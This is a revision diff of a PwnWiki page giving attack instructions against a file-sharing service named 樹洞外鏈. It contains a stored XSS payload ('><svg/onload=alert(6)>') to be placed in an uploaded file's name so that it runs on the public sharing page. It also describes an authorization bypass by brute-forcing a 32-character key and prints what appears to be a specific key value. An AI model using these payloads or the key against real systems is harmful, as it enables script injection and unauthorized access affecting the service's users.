Difference between revisions of "樹洞外鏈XSS&越權漏洞"
From PwnWiki
(Created page with "==XSS== <pre> ><svg/onload=alert(6)> </pre> 上傳一張圖片,在創建文件名添加xss,公開是分享文件廣場。 ==越權漏洞== (需要條件,可以爆破...") |
|||
| Line 6: | Line 6: | ||
==越權漏洞== | ==越權漏洞== | ||
| − | + | 條件,可以爆破。32位隨機字符 | |
| − | + | 需要key值。 | |
| − | |||
<pre> | <pre> | ||
c74bffaa1cd2a4eda30bd72fe5453bb0 | c74bffaa1cd2a4eda30bd72fe5453bb0 | ||
</pre> | </pre> | ||
Latest revision as of 12:57, 14 April 2021
XSS
><svg/onload=alert(6)>
上傳一張圖片,在創建文件名添加xss,公開是分享文件廣場。
越權漏洞
條件,可以爆破。32位隨機字符 需要key值。
c74bffaa1cd2a4eda30bd72fe5453bb0
